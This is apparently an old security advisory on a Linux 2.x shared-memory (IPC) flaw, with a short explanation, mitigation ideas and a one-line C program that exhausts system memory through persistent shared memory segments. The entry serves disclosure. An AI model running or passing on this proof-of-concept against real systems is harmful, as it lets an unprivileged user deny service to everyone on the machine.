COMMAND

    IPC

SYSTEMS AFFECTED

    Linux 2.x

PROBLEM

    Michal Zalewski found following.   Linux IPC implementation  seems
    to  be  broken.   In  fact,  any  luser  may  consume whole memory
    available on system using this simple program:

        extern int errno;int i,d=1;char*x;main(){while(1){x=shmat(shmget(0,10000000/
        d,511),0,0);if(errno){d*=10;continue;}for(i=0;i<10000000/d;i++)if(*(x+i));}}

    Memory won't be freed even if luser's process will be killed,  you
    have to use  ipcrm, but there  could be not  enough memory to  run
    anything.  Under early 2.2.x, you have to run this program several
    times,  to  ensure  pages  are  detached  (in this state, they are
    onwerless.

SOLUTION

    The  simpliest  solution  is  to  restrict  for lusers IPC at all.
    Only a few programs uses IPC - probably only dosemu and ShoutCast.
    As  Solar  Designer  said,  there  are  'beancounter'  feature (or
    per-user limits,  instead of  per-process).   Probably it  will be
    implemented in 2.2.x kernels soon.  As today, it's hard to control
    detached IPC pages.